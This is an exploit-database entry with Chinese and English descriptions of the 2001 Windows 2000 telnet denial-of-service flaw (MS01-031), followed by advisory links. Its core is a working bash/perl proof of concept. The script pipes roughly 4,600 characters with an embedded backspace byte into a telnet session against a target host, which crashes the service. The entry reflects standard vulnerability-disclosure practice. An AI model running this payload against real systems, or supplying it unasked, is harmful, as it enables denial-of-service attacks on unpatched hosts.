https://www.exploit-db.com/exploits/20907
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-158

MicrosoftWindows2000telnetservice存在漏洞。本地用户可以借助包含一个退格符的超长logon命令导致服务拒绝（崩溃）。

source: http://www.securityfocus.com/bid/2838/info

Due to a flaw in the implementation of the telnet service, it is possible for a remote client to perform a denial of service attack against a host.

If approximately 4300 characters already exist in the input buffer and additional numerous specially chosen characters are provided, the service will stop responding. 

#!/bin/bash
  ( sleep 1
    perl -e '{printf "%sx7f%s","A"x4500,"A"x100}'
    sleep 3
  ) | telnet victimbox
  - eof -

来源:MS
名称:MS01-031
链接:http://www.microsoft.com/technet/security/bulletin/MS01-031.asp
来源:XF
名称:win2k-telnet-username-dos(6666)
链接:http://xforce.iss.net/static/6666.php
来源:CIAC
名称:L-092
链接:http://www.ciac.org/ciac/bulletins/l-092.shtml
来源:BINDVIEW
名称:20010608RangecheckingfaultconditioninMicrosoftWindows2000Telnetserver
链接:http://razor.bindview.com/publish/advisories/adv_mstelnet.html